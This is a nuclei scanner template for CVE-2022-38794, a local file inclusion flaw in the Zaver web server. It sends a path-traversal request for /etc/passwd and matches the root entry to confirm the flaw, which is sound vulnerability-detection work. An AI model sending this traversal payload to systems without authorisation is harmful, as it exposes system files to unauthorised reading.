nuclei-templates/http/cves/2022/CVE-2022-38794.yaml

38 lines
882 B
YAML

id: CVE-2022-38794
info:
name: Zaver - Local File Inclusion
author: pikpikcu
severity: high
description: |
Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring.
reference:
- https://github.com/zyearn/zaver/issues/22
- https://nvd.nist.gov/vuln/detail/CVE-2022-38794
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-38794
cwe-id: CWE-22
cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:*
epss-score: 0.00267
tags: cve,cve2022,lfi,zaver
metadata:
max-request: 1
http:
- method: GET
path:
- '{{BaseURL}}/../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200